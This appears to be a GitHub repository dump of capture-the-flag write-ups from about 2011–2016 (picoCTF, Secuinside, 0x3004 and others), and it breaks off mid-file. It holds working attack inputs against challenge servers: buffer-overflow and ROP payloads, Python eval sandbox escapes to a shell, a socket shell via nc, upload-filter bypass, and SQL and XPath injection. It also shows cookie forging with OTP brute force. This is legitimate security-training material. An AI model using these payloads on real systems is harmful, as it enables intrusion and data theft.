├── 2011 └── gogoomas2011.pdf ├── 2013 ├── codegate_2013 │ ├── codegate2013.pdf │ ├── jeopardy_final.png │ ├── web400_exploit.frm │ └── web500.md ├── hdcon_2013 │ └── hdcon2013.md ├── juniorctf_2013 │ └── juniorctf2013.pdf ├── picoctf_2013 │ └── README.md └── secuinside_2013 │ └── README.md ├── 2014 ├── 0x3004_2014 │ ├── RE │ │ └── README.md │ ├── misc │ │ ├── Misc100_Wireshark │ │ │ └── README.md │ │ ├── Misc10_Wolfram-g4mm4 │ │ │ └── solution.jpg │ │ ├── Misc200_DOTO, BEST DOTO │ │ │ ├── solution.txt │ │ │ └── src │ │ │ │ ├── Form1.frm │ │ │ │ ├── Project1.vbp │ │ │ │ └── Project1.vbw │ │ └── Misc50_Hidden1 │ │ │ └── README.md │ ├── scoreboard.png │ ├── task_map.png │ └── web │ │ ├── README.md │ │ ├── xyz_bank_success.png │ │ ├── xyz_template_success.png │ │ └── xyz_template_trace.png ├── PHDays_2014 │ ├── README.md │ ├── backup │ │ ├── Minecraft_really_stereotyped!!.png │ │ ├── PHP_JL.php │ │ └── QUEST_ALL │ │ │ ├── #PRISM-13-Mar-2012.log │ │ │ ├── #PRISM-15-Aug-2012.log │ │ │ ├── #PRISM-20-Feb-2013.log │ │ │ ├── #PRISM-21-Feb-2013.log │ │ │ ├── #PRISM-21-May-2013.log │ │ │ ├── #PRISM-22-May-2013.log │ │ │ ├── #PRISM-23-Jul-2012.log │ │ │ ├── #derrorim-09-Jan-2013.log │ │ │ ├── #derrorim-19-Mar-2013.log │ │ │ ├── #derrorim-24-Jul-2012.log │ │ │ ├── #derrorim-25-Dec-2012.log │ │ │ ├── GeraldMalkin.log │ │ │ ├── ap0linand0r.log │ │ │ ├── gerald.zip │ │ │ └── gerald │ │ │ ├── README.txt │ │ │ └── projects │ │ │ ├── Credentials.txt │ │ │ ├── Derrorim.txt │ │ │ ├── Detcelfer Estimate.xlsx │ │ │ ├── Detcelfer.txt │ │ │ ├── PRISM.pdf │ │ │ ├── PRISM.txt │ │ │ └── Zohers.txt │ └── scoreboard.png ├── RuCTF_2014 │ ├── README.md │ ├── RECON │ │ ├── 100_FAVORITE_BOOK │ │ │ ├── 100.txt │ │ │ ├── google_search.png │ │ │ └── oZmiuKnAUs4.jpg │ │ ├── 200_STOLEN_CAMERA │ │ │ └── solution.txt │ │ └── 300_GET_THE_MESSAGE │ │ │ ├── 1-here.jpg │ │ │ └── solution.txt │ ├── misc │ │ └── README.md │ ├── ranking.png │ ├── solved.png │ ├── stegano │ │ └── README.md │ └── web │ │ ├── README.md │ │ ├── web100.exe │ │ └── web300.gif ├── codegate_2014 │ ├── README.md │ ├── web200.exe │ └── web500.exe ├── csaw_2014 │ ├── README.md │ ├── crypto │ │ ├── README.md │ │ └── crypto200.php │ ├── exploitation │ │ └── README.md │ ├── forensic │ │ ├── README.md │ │ └── pdf.pdf │ ├── networking │ │ └── README.md │ ├── re │ │ └── README.md │ ├── recon │ │ └── README.md │ ├── trivia │ │ └── README.md │ └── web │ │ └── README.md ├── defcon22_finals │ ├── defcon_packet_sniff.zip │ ├── defense.png │ └── ip_list.txt └── secuinside_2014 │ └── Secuinside2014.pdf ├── 2015 ├── 0ctf_2015 │ └── README.md ├── bctf_2015 │ └── README.md ├── codegate_2015 │ └── README.md ├── hust_2015 │ └── writeup_dcua.pdf ├── inc0gnito_2015 │ └── writeup_dcua.pdf ├── jff3_2015 │ └── README.md └── polictf_2015 │ └── README.md ├── 2016 └── bkp_2016 │ └── README.md └── README.md /2011/gogoomas2011.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2011/gogoomas2011.pdf -------------------------------------------------------------------------------- /2013/codegate_2013/codegate2013.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2013/codegate_2013/codegate2013.pdf -------------------------------------------------------------------------------- /2013/codegate_2013/jeopardy_final.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2013/codegate_2013/jeopardy_final.png -------------------------------------------------------------------------------- /2013/codegate_2013/web400_exploit.frm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2013/codegate_2013/web400_exploit.frm -------------------------------------------------------------------------------- /2013/codegate_2013/web500.md: -------------------------------------------------------------------------------- 1 | ## Web500 Workout 2 | 3 | 4 | ``` 5 | "\x01\x01\x77\x9b\x2a\xce\x2e\x56\x53\xc7\x4d\xac\x53\xc7\x2b\x55\x4f\x09\x36\xf5\x70\x35\xef\x34\x8d\x0e\x30\x87\xf6\x30\xff\x42\x24\xff\xa0\xa1\x08\x12" 6 | 7 | wow! key is "W3LC0M3_T0_L0L0L0L" 8 | ``` 9 | 10 | -- 11 | src: 12 | 13 | ``` 14 | 25 | ``` 26 | 27 | -- 28 | 29 | ``` 30 | 51 | ``` 52 | 53 | -- 54 | 55 | ``` 56 | 70 | ``` -------------------------------------------------------------------------------- /2013/hdcon_2013/hdcon2013.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2013/hdcon_2013/hdcon2013.md -------------------------------------------------------------------------------- /2013/juniorctf_2013/juniorctf2013.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2013/juniorctf_2013/juniorctf2013.pdf -------------------------------------------------------------------------------- /2013/picoctf_2013/README.md: -------------------------------------------------------------------------------- 1 | ## Failure to boot 2 | 3 | By guessing you get the flag 4 | 5 | ``` 6 | sda1 .. fail! 7 | fat32.. success! 8 | ``` 9 | 10 | ## Read the manual 11 | 12 | I have coded ROT-* solver long time ago.. so I tried ROT-* solve and solved this problem. 13 | 14 | Decrypted Text: 15 | `IMPORTANT: To enter automatic recovery mode, enter the following recovery key cbcfebeaeeed"` 16 | 17 | ## XMLOL 18 | You just need to download xml file and open with notepad. But i tried with view-source way. 19 | view-source:https://picoctf.com/problems/xmlol.xml 20 | This flag code was written on the xml file: 21 | `d6b6aba9c44bf3dd58809c46e2c0ffba` 22 | 23 | ## Technician Challenge 24 | Search about geohot using google and you will find the answer. 25 | I don't exactly remember, but the key is Nissan ~~~ 26 | 27 | ## First Contact 28 | just look through the hex-codes of the pcap file you will find the answer :) 29 | 30 | ## Python eval 1 31 | `nc python.picoctf.com 6361` 32 | I didnt use eval to do it, because it's still possible to do with an easy math calculation. 33 | 34 | ## Python eval 2 35 | `nc python.picoctf.com 6362` 36 | the point is that you have to use eval and get the flag. 37 | so I tried the exploit which is shown below: 38 | ``` 39 | guess> (len(flag), randint(0,9), randint(0,9), randint(0,9), randint(0,9)) 40 | guess> (str(flag[:25]), randint(0,9), randint(0,9), randint(0,9), randint(0,9)) 41 | i_are_a_pyeval_mastermind 42 | ``` 43 | 44 | ## Python eval 3 45 | `nc python.picoctf.com 6363` 46 | __import__ is disabled but you find the working path. 47 | ``` 48 | > path.os.execl("/bin/bash", "") 49 | cat your_flag_here 50 | eval_is_super_OSsome 51 | ``` 52 | 53 | ## Python eval 4 54 | nc python.picoctf.com 6364 55 | 56 | if GET params like "foo=bar" is sent to server, server will put the get param as {"a":"b"} 57 | so by escaping from the brackets and quote sign, you can execute /bin/sh/ successfully. 58 | ``` 59 | GET /index.html?a=b"+input(path.os.execl("/bin/sh",""))+"a HTTP/1.1 60 | Host: python.picoctf.com:6364 61 | Connection: keep-alive 62 | cat super_awesome_flag 63 | kids_dont_code_like_this_at_home 64 | ``` 65 | 66 | ## harder_serial 67 | just keep your eyes open and understand each lines of the code. 68 | hint: look for the statement that starts from * 0. 69 | 42813724579039578812 70 | 71 | ## Overflow1 72 | Well, it was easier then expected. 73 | We just need to put variable \x01. 74 | since the variable was before the buffer, I tried 75 | ./simple_overwrite $(perl -e 'print "\x41"x64 . "\x01";') 76 | 77 | ## Overflow2 78 | it was similar question as overflow1, but the variable was little far away. 79 | By using this code below, you can set the variable by overwriting stack. 80 | ./stack_overwrite $(perl -e 'print "\x41"x80 . "\x01";') 81 | 82 | ## Overflow3 83 | The question is to call not_called function, which is from 0x080485f8. 84 | so by using this code below, I have called the function and got the shell. 85 | ./buffer_overflow $(perl -e 'print "\x41"x76 . "\xf8\x85\x04\x08";') 86 | 87 | ## ROP1 88 | The question was to call the function, so.. 89 | cat <(perl -e 'print "\x41"x36 . "AAAA" . "\xa4\x84\x04\x08"') - | ./rop1 90 | 91 | ## ROP2 92 | As the question says, we have to put /bin/bash to the system function. 93 | So, the payload should be something like below: 94 | ``` 95 | ["a"*128][bbbb][&system][cccc][&"/bin/bash"] 96 | But, I couldn't make it successful. 97 | cat <(perl -e 'print "\x41"x128 . "BBBB" . "\xb1\x84\x04\x08" . "CCCC" . "\xa0\x84\x04\x08";') - | ./rop2 98 | ``` 99 | 100 | ## Chromatophoria 101 | Painted the background with black color and gotcha! 102 | 103 | ## GETKey 104 | there's nothing much to do in this question. 105 | if you look at carefully at GET param, which is foo.php?getparam=blah, 106 | you will figure out that the admin param is false and other one is ccdc 107 | so if you change admin param to true and other one as pico or picoctf, you get the right answer. 108 | 109 | ## Injection 110 | the question seem to be having eregi function to disallow access for the admin. 111 | so, i inserted guest'='guest as userid, in which all the user will be fetched out. 112 | at the end, I got all the userid and the password at one page including the password for the admin :0 113 | 114 | ## PHP3 115 | this was the md5-based sql injection 116 | the point is that the bug exists in PHP 117 | I don't want to waste my time bruteforcing for the exploit. 118 | so I googled for the code and got the answer using the code from leetctf 2010. 119 | 120 | ## PHP4 121 | well, again it's the sql injection. 122 | I did the blind sql injection, and the password for admin was 'notarealhash' 123 | so i figured out that you have to make the sql output as the password you want. 124 | so, I used this sql code below as userid so that the password is md5('test'); 125 | ```' AND 1=0 UNION SELECT '098f6bcd4621d373cade4e832627b4f6'# ``` 126 | and password as test. I successfully got the answer. 127 | r -------------------------------------------------------------------------------- /2013/secuinside_2013/README.md: -------------------------------------------------------------------------------- 1 | ## GiveMeShell 2 | 3 | first of all, givemeshell is the "ELF 32-bit LSB executable". 4 | By trying a bit of reverse engineering, you get to know that the challenge executes the first 5 characters of the input in the remote shell. 5 | since the program accesses the input with the fork, we can use the file descriptor 4 (which is socket) to spawn the shell and list the key. 6 | 7 | ``` 8 | C:\Users\Samsung>nc 119.70.231.180 8765 9 | sh<&4 10 | ls>&4 11 | cat key>&4 12 | key : WeLoveShell 13 | ``` 14 | 15 | ## Secure Web 16 | 17 | You can upload a image but the upload does not check file extension while it checks for the content type. 18 | By uploading a file with php extension with the content-type: image/png, you will be able to list directory and get the flag. 19 | 20 | the flag was in /home/dwh300/flags 21 | 22 | ``` 23 | ad8888888888ba 24 | dP' `"8b, 25 | 8 ,aaa, "Y888a ,aaaa, ,aaa, ,aa, 26 | 8 8' `8 "8baaaad""""baaaad""""baad""8b 27 | 8 8 8 """" """" "" 8b 28 | 8 8, ,8 ,aaaaaaaaaaaaaaaaaaaaaaaaddddd88P 29 | 8 `"""' ,d8"" 30 | Yb, ,ad8" Congratulations!!!! 31 | "Y8888888888P" key is \"!!xx_^s0m3th1ng wr0ng^_yy!!\" 32 | ``` -------------------------------------------------------------------------------- /2014/0x3004_2014/RE/README.md: -------------------------------------------------------------------------------- 1 | ## PHPVLD 2 | 3 | At first sight, I noticed that this challenge sounds like a half decrypted php sourcecode 4 | I searched for php opcodes and I found this: http://www.php.net/manual/en/internals2.opcodes.list.php 5 | 6 | by installing php5vld and fuzzing it I got the sourcecode below: 7 | 8 | ``` 9 |
You got it here is your flag: " . FLAG; 18 | } 19 | } 20 | } 21 | ?> 22 | ``` 23 | 24 | I found this as md5 collision and by googling you can get the string (http://www.links.org/?p=6) 25 | at the end, you get the flag by inserting the manipulated variables. 26 | 27 | -- 28 | 29 | ### original extract 30 | ``` 31 | phpvld@phpvld:/var/www/$php -d vld.active=1 -d vld.execute=0 -f index.php 32 | 33 | Finding entry points 34 | Branch analysis from position: 0 35 | Jump found. Position 1 = 19, Position 2 = 42 36 | Branch analysis from position: 19 37 | Jump found. Position 1 = 26, Position 2 = 41 38 | Branch analysis from position: 26 39 | Jump found. Position 1 = 36, Position 2 = 40 40 | Branch analysis from position: 36 41 | Jump found. Position 1 = 40 42 | Branch analysis from position: 40 43 | Jump found. Position 1 = 41 44 | Branch analysis from position: 41 45 | Jump found. Position 1 = 42 46 | Branch analysis from position: 42 47 | Return found 48 | Branch analysis from position: 40 49 | Branch analysis from position: 41 50 | Branch analysis from position: 42 51 | filename: /var/www/0x3004/100-phpvld/index.php 52 | function name: (null) 53 | number of ops: 43 54 | compiled vars: !0 = $s1, !1 = $s2 55 | line # * op fetch ext return operands 56 | --------------------------------------------------------------------------------- 57 | 2 0 > SEND_VAL 0 58 | 1 DO_FCALL 1 'error_reporting' 59 | 3 2 INCLUDE_OR_EVAL 'flag.php', REQUIRE_ONCE 60 | 4 3 FETCH_R global $3 '_SERVER' 61 | 4 FETCH_DIM_R $4 $3, 'REMOTE_ADDR' 62 | 5 SEND_VAR $4 63 | 6 DO_FCALL 1 $5 'md5' 64 | 7 FETCH_R global $2 '_GET' 65 | 8 FETCH_DIM_R $6 $2, $5 66 | 9 ASSIGN !0, $6 67 | 5 10 FETCH_R global $9 '_SERVER' 68 | 11 FETCH_DIM_R $10 $9, 'HTTP_USER_AGENT' 69 | 12 SEND_VAR $10 70 | 13 DO_FCALL 1 $11 'md5' 71 | 14 FETCH_R global $8 '_GET' 72 | 15 FETCH_DIM_R $12 $8, $11 73 | 16 ASSIGN !1, $12 74 | 6 17 IS_NOT_EQUAL ~14 !0, !1 75 | 7 18 > JMPZ ~14, ->42 76 | 19 > SEND_VAR !0 77 | 20 DO_FCALL 1 $15 'md5' 78 | 21 SEND_VAL 'md5' 79 | 22 SEND_VAR !1 80 | 23 DO_FCALL 2 $16 'hash' 81 | 24 IS_IDENTICAL ~17 $15, $16 82 | 8 25 > JMPZ ~17, ->41 83 | 26 > SEND_VAL 'sha512' 84 | 27 SEND_VAR !0 85 | 28 SEND_VAL true 86 | 29 DO_FCALL 3 $18 'hash' 87 | 30 SEND_VAL 'sha512' 88 | 31 SEND_VAR !1 89 | 32 SEND_VAL true 90 | 33 DO_FCALL 3 $19 'hash' 91 | 34 IS_NOT_EQUAL ~20 $18, $19 92 | 9 35 > JMPZ ~20, ->40 93 | 36 > FETCH_CONSTANT ~21 'FLAG' 94 | 37 CONCAT ~22 'You+got+it+%3B%29+Here+is+your+flag%3A+', ~21 95 | 38 ECHO ~22 96 | 39 > JMP ->40 97 | 10 40 > > JMP ->41 98 | 41 > > JMP ->42 99 | 42 > > RETURN 1 100 | 101 | branch: # 0; line: 2- 7; sop: 0; eop: 18; out1: 19; out2: 42 102 | branch: # 19; line: 7- 8; sop: 19; eop: 25; out1: 26; out2: 41 103 | branch: # 26; line: 8- 9; sop: 26; eop: 35; out1: 36; out2: 40 104 | branch: # 36; line: 9- 9; sop: 36; eop: 39; out1: 40 105 | branch: # 40; line: 10- 10; sop: 40; eop: 40; out1: 41 106 | branch: # 41; line: 10- 10; sop: 41; eop: 41; out1: 42 107 | branch: # 42; line: 10- 10; sop: 42; eop: 42 108 | path #1: 0, 19, 26, 36, 40, 41, 42, 109 | path #2: 0, 19, 26, 40, 41, 42, 110 | path #3: 0, 19, 41, 42, 111 | path #4: 0, 42, 112 | ``` 113 | 114 | -- 115 | 116 | ### my extract 117 | 118 | ``` 119 | [root@localhost test]# php -d vld.active=1 -d vld.execute=0 -f index.php 120 | Finding entry points 121 | Branch analysis from position: 0 122 | Jump found. Position 1 = 19, Position 2 = 42 123 | Branch analysis from position: 19 124 | Jump found. Position 1 = 26, Position 2 = 41 125 | Branch analysis from position: 26 126 | Jump found. Position 1 = 36, Position 2 = 40 127 | Branch analysis from position: 36 128 | Jump found. Position 1 = 40 129 | Branch analysis from position: 40 130 | Jump found. Position 1 = 41 131 | Branch analysis from position: 41 132 | Jump found. Position 1 = 42 133 | Branch analysis from position: 42 134 | Return found 135 | Branch analysis from position: 40 136 | Branch analysis from position: 41 137 | Branch analysis from position: 42 138 | filename: /root/test/index.php 139 | function name: (null) 140 | number of ops: 43 141 | compiled vars: !0 = $addr, !1 = $user 142 | line # * op fetch ext return operands 143 | --------------------------------------------------------------------------------- 144 | 2 0 > SEND_VAL 0 145 | 1 DO_FCALL 1 'error_reporting' 146 | 3 2 INCLUDE_OR_EVAL 'flag.php', REQUIRE_ONCE 147 | 4 3 FETCH_R global $3 '_SERVER' 148 | 4 FETCH_DIM_R $4 $3, 'REMOTE_ADDR' 149 | 5 SEND_VAR $4 150 | 6 DO_FCALL 1 $5 'md5' 151 | 7 FETCH_R global $2 '_GET' 152 | 8 FETCH_DIM_R $6 $2, $5 153 | 9 ASSIGN !0, $6 154 | 5 10 FETCH_R global $9 '_SERVER' 155 | 11 FETCH_DIM_R $10 $9, 'HTTP_USER_AGENT' 156 | 12 SEND_VAR $10 157 | 13 DO_FCALL 1 $11 'md5' 158 | 14 FETCH_R global $8 '_GET' 159 | 15 FETCH_DIM_R $12 $8, $11 160 | 16 ASSIGN !1, $12 161 | 6 17 IS_NOT_EQUAL ~14 !0, !1 162 | 18 > JMPZ ~14, ->42 163 | 7 19 > SEND_VAR !0 164 | 20 DO_FCALL 1 $15 'md5' 165 | 21 SEND_VAL 'md5' 166 | 22 SEND_VAR !1 167 | 23 DO_FCALL 2 $16 'hash' 168 | 24 IS_IDENTICAL ~17 $15, $16 169 | 25 > JMPZ ~17, ->41 170 | 8 26 > SEND_VAL 'sha512' 171 | 27 SEND_VAR !0 172 | 28 SEND_VAL true 173 | 29 DO_FCALL 3 $18 'hash' 174 | 30 SEND_VAL 'sha512' 175 | 31 SEND_VAR !1 176 | 32 SEND_VAL true 177 | 33 DO_FCALL 3 $19 'hash' 178 | 34 IS_NOT_EQUAL ~20 $18, $19 179 | 35 > JMPZ ~20, ->40 180 | 9 36 > FETCH_CONSTANT ~21 'FLAG' 181 | 37 CONCAT ~22 '%3Cbr%3E%3Cbr%3EYou+got+it+here+is+your+flag%3A+', ~21 182 | 38 ECHO ~22 183 | 10 39 > JMP ->40 184 | 11 40 > > JMP ->41 185 | 12 41 > > JMP ->42 186 | 14 42 > > RETURN 1 187 | 188 | branch: # 0; line: 2- 6; sop: 0; eop: 18; out1: 19; out2: 42 189 | branch: # 19; line: 7- 7; sop: 19; eop: 25; out1: 26; out2: 41 190 | branch: # 26; line: 8- 8; sop: 26; eop: 35; out1: 36; out2: 40 191 | branch: # 36; line: 9- 10; sop: 36; eop: 39; out1: 40 192 | branch: # 40; line: 11- 11; sop: 40; eop: 40; out1: 41 193 | branch: # 41; line: 12- 12; sop: 41; eop: 41; out1: 42 194 | branch: # 42; line: 14- 14; sop: 42; eop: 42 195 | path #1: 0, 19, 26, 36, 40, 41, 42, 196 | path #2: 0, 19, 2, 40, 41, 42, 197 | path #3: 0, 19, 41, 42, 198 | path #4: 0, 42, 199 | [root@localhost test]# 200 | ``` -------------------------------------------------------------------------------- /2014/0x3004_2014/misc/Misc100_Wireshark/README.md: -------------------------------------------------------------------------------- 1 | ### Wireshark 2 | 3 | Since it is based on HTTP packets, 4 | 5 | 1) convert the file extension from pcapng to txt 6 | 2) Open with a notepad 7 | 3) Ctrl+F(Find) for 0x3004 8 | 4) profit! 9 | 10 | ``` 11 | I send you a wireshark logo and the flag 0x3004{I_l0v3_wir35h4rk_S0_MUCH!}. 12 | ``` 13 | 14 | -------------------------------------------------------------------------------- /2014/0x3004_2014/misc/Misc10_Wolfram-g4mm4/solution.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2014/0x3004_2014/misc/Misc10_Wolfram-g4mm4/solution.jpg -------------------------------------------------------------------------------- /2014/0x3004_2014/misc/Misc200_DOTO, BEST DOTO/solution.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2014/0x3004_2014/misc/Misc200_DOTO, BEST DOTO/solution.txt -------------------------------------------------------------------------------- /2014/0x3004_2014/misc/Misc200_DOTO, BEST DOTO/src/Form1.frm: -------------------------------------------------------------------------------- 1 | VERSION 5.00 2 | Begin VB.Form Form1 3 | Caption = "Form1" 4 | ClientHeight = 3195 5 | ClientLeft = 60 6 | ClientTop = 345 7 | ClientWidth = 4680 8 | LinkTopic = "Form1" 9 | ScaleHeight = 3195 10 | ScaleWidth = 4680 11 | StartUpPosition = 3 'Windows Default 12 | Begin VB.CommandButton Command1 13 | Caption = "Command1" 14 | Height = 855 15 | Left = 480 16 | TabIndex = 0 17 | Top = 600 18 | Width = 2295 19 | End 20 | End 21 | Attribute VB_Name = "Form1" 22 | Attribute VB_GlobalNameSpace = False 23 | Attribute VB_Creatable = False 24 | Attribute VB_PredeclaredId = True 25 | Attribute VB_Exposed = False 26 | Private Sub Command1_Click() 27 | Dim winhttp As New winhttp.WinHttpRequest 28 | Dim no$, att() As Variant, trial$, dump$ 29 | On Error GoTo GiveMeFlag 30 | att = Array("50", "125", "115", "100", "50", "150", "150", "150", "175", "225", "250", "450", "200", "325", "350", "450", "470", "485", "500", "525", "500", "600", "800", "875", "2250", "2670", "2700", "2700", "2150", "2600", "2950", "3000", "2125", "2200", "2225", "3300", "1850", "1900", "2050", "2050", "275", "875", "875", "1000", "1750", "3300", "5050", "6200", "135", "200", "250", "325", "550", "1450", "1350", "1400") 31 | 'MsgBox att(46) 32 | 'Exit Sub 33 | winhttp.Open "GET", "http://challenges.wargame.vn/200-doto_8a89b5cb130e8e18259b1ec13595c39c/" 34 | winhttp.SetRequestHeader "Cookie", "PHPSESSID=givemeleflag" 35 | winhttp.Send 36 | dump = winhttp.ResponseText 37 | trial = Split(Split(winhttp.ResponseText, " TIMES REMAINING!")(0), "")(1) 38 | no = Split(Split(winhttp.ResponseText, "")(0) 39 | Form1.Caption = trial 40 | On Error Resume Next 41 | dump = att(no) 42 | If dump = vbNullString Or dump = 0 Then 43 | dump = 2150 44 | End If 45 | winhttp.Open "POST", "http://challenges.wargame.vn/200-doto_8a89b5cb130e8e18259b1ec13595c39c/" 46 | winhttp.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded" 47 | winhttp.SetRequestHeader "Cookie", "PHPSESSID=givemele_flag" 48 | winhttp.Send "gold=" & att(no) 49 | winhttp.WaitForResponse 50 | Exit Sub 51 | GiveMeFlag: 52 | MsgBox winhttp.ResponseText 53 | 54 | End Sub 55 | -------------------------------------------------------------------------------- /2014/0x3004_2014/misc/Misc200_DOTO, BEST DOTO/src/Project1.vbp: -------------------------------------------------------------------------------- 1 | Type=Exe 2 | Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\Windows\SysWOW64\stdole2.tlb#OLE Automation 3 | Reference=*\G{662901FC-6951-4854-9EB2-D9A2570F2B2E}#5.1#0#..\..\..\..\windows\system32\winhttp.dll#Microsoft WinHTTP Services, version 5.1 4 | Form=Form1.frm 5 | Startup="Form1" 6 | Command32="" 7 | Name="Project1" 8 | HelpContextID="0" 9 | CompatibleMode="0" 10 | MajorVer=1 11 | MinorVer=0 12 | RevisionVer=0 13 | AutoIncrementVer=0 14 | ServerSupportFiles=0 15 | VersionCompanyName="IMFASTKR" 16 | CompilationType=0 17 | OptimizationType=0 18 | FavorPentiumPro(tm)=0 19 | CodeViewDebugInfo=0 20 | NoAliasing=0 21 | BoundsCheck=0 22 | OverflowCheck=0 23 | FlPointCheck=0 24 | FDIVCheck=0 25 | UnroundedFP=0 26 | StartMode=0 27 | Unattended=0 28 | Retained=0 29 | ThreadPerObject=0 30 | MaxNumberOfThreads=1 31 | -------------------------------------------------------------------------------- /2014/0x3004_2014/misc/Misc200_DOTO, BEST DOTO/src/Project1.vbw: -------------------------------------------------------------------------------- 1 | Form1 = 44, 44, 956, 520, , 22, 22, 934, 498, C 2 | -------------------------------------------------------------------------------- /2014/0x3004_2014/misc/Misc50_Hidden1/README.md: -------------------------------------------------------------------------------- 1 | ## Hidden 1 2 | 3 | ``` 4 | Microsoft Windows [Version 6.1.7601] 5 | Copyright (c) 2009 Microsoft Corporation. All rights reserved. 6 | 7 | C:\Users\Harold>nc challenges.wargame.vn 80 8 | GET / HTTP/1.0 9 | Host: challenges.wargame.vn 10 | 11 | HTTP/1.1 200 OK 12 | Date: Wed, 30 Apr 2014 04:38:14 GMT 13 | Server: Apache/2.2.22 (Ubuntu) 14 | X-Powered-By: PHP/5.4.6-1ubuntu1.8 15 | Vary: Accept-Encoding 16 | Content-Length: 47 17 | Connection: close 18 | Content-Type: text/html 19 | 20 | 21 | C:\Users\Harold> 22 | ``` -------------------------------------------------------------------------------- /2014/0x3004_2014/scoreboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2014/0x3004_2014/scoreboard.png -------------------------------------------------------------------------------- /2014/0x3004_2014/task_map.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2014/0x3004_2014/task_map.png -------------------------------------------------------------------------------- /2014/0x3004_2014/web/README.md: -------------------------------------------------------------------------------- 1 | ## Path to Pro 2 | 3 | It was a bit tricky challenge. 4 | 5 | admin has given the hint in the IRC channel itself that the title is the hint. 6 | First I found out that the SQL Injection works to the pass or user param. 7 | 8 | ``` 9 | REQUEST: http://challenges.wargame.vn/100-path-to-pro_548f20feaa3736e0c7320fc5e5b14a8c/?name=guest&pass=1%22+or+1+and+%221 10 | RESULT: 11 | nothing, flag is not here ;) 12 | Maybe if you login as 'admin' you will find my secret 13 | ``` 14 | 15 | However, I found something weird; only substring() function worked and nothing else were working. 16 | After searching the problem for hours, I later found out that the login runs with xpath checks. 17 | 18 | ``` 19 | REQUEST: http://challenges.wargame.vn/100-path-to-pro_548f20feaa3736e0c7320fc5e5b14a8c/?name=guest&pass=-1%22+or+count(//user/child::node())=5+and+%221 20 | RESULT: 21 | nothing, flag is not here ;) 22 | Maybe if you login as 'admin' you will find my secret 23 | ``` 24 | 25 | after using some xpath injections, I successfully got the flag with a decent path listing. 26 | 27 | ``` 28 | REQUEST:http://challenges.wargame.vn/100-path-to-pro_548f20feaa3736e0c7320fc5e5b14a8c/?name=guest&pass=1%22]%20|%20//*%20|//*[%221%22=%221 29 | REQUEST: 30 | 31 | 32 | 33 | nothing, flag is not here ;) 34 | 35 | 36 | 37 | Maybe if you login as 'admin' you will find my secret 38 | 39 | 40 | 41 | 0x3004{XXXpath} 42 | ``` 43 | 44 | flag: `0x3004{XXXpath}` 45 | 46 | 47 | -- 48 | 49 | ## XYZ BANK 50 | 51 | I found out that the cookie has credentials. 52 | 53 | ``` 54 | document.cookie 55 | credential="WyJndWVzdCIsICJndWVzdCIsICIxMjM0Il0=" 56 | ``` 57 | 58 | so if I decrypt the base64 string, 59 | ``` 60 | atob("WyJndWVzdCIsICJndWVzdCIsICIxMjM0Il0=") 61 | '["guest", "guest", "1234"]' 62 | ``` 63 | 64 | It becomes `["guest", "guest", "1234"]`, which I can now assume that the cookie is a json. 65 | 66 | as I go through further, I found out that it redirects to the page if I write True, but it gives credential error with true. 67 | 68 | Considering that I can bypass the username, 69 | I have successfully bypassed password verification after trying out several codes from errors that I've got. 70 | 71 | ``` 72 | document.cookie='credential="'+btoa('["guest",True,1234]')+'"'; 73 | document.location.href="http://challenges.wargame.vn:50003/"; 74 | (Redirects) 75 | 76 | .. 77 | 78 | document.cookie='credential="'+btoa('["guest",1,1234]')+'"'; 79 | document.location.href="http://challenges.wargame.vn:50003/"; 80 | (Wrong credentials) 81 | 82 | .. 83 | 84 | 85 | document.cookie='credential="'+btoa('["guest",False,1234]')+'"'; 86 | document.location.href="http://challenges.wargame.vn:50003/"; 87 | (Redirects) 88 | 89 | .. 90 | 91 | document.cookie='credential="'+btoa('["guest",0,1234]')+'"'; 92 | document.location.href="http://challenges.wargame.vn:50003/"; 93 | (info page) 94 | ``` 95 | 96 | So, I can now access admin by bruteforcing the OTP! 97 | 98 | ``` 99 | document.cookie='credential="'+btoa('["admin",0,0001]')+'"'; 100 | document.location.href="http://challenges.wargame.vn:50003/"; 101 | (Wrong credentials) 102 | 103 | .. 104 | 105 | document.cookie='credential="'+btoa('["admin",0,7331]')+'"'; 106 | document.location.href="http://challenges.wargame.vn:50003/"; 107 | (info page) 108 | ``` 109 | 110 | ![success](xyz_bank_success.png) 111 | 112 | Flag is: `Good boy! 0x3004{goooo_home_homie}` 113 | 114 | -- 115 | 116 | ## XYZ TEMPLATE 117 | 118 | If I login as guest/guest, we find a page with template input textboxes. 119 | Above that, we also see a feedback form to write out few details. 120 | 121 | I also have decrypted username and password for cookies. 122 | ``` 123 | document.cookie 124 | "username=guest; password=guest" 125 | ``` 126 | 127 | I can now conclude that this question is obviously about XSS, since this is a website with html input available with sending stuff to admin. 128 | Anyways, we firstly input the default values in the input box and submit. 129 | 130 | ``` 131 | HTML: (default) 132 | PARAMS: (default) 133 | http://challenges.wargame.vn:50004/template/41845810235ae981f0f8ed2d80580e7a) 134 | ``` 135 | 136 | Let's have a look at the sourcecode of the template page. 137 | 138 | ``` 139 | setTimeout(function(){ 140 | var html = document.getElementById('html').value; 141 | var params = (function(){ 142 | var obj = JSON.parse(document.getElementById('params').value); 143 | return obj; 144 | })(); 145 | console.dir(params); 146 | var render_tmpl = new tmpl(html,params); 147 | document.getElementById('result').innerHTML = render_tmpl.render(); 148 | },300); 149 | 150 | function tmpl(content,params){ 151 | 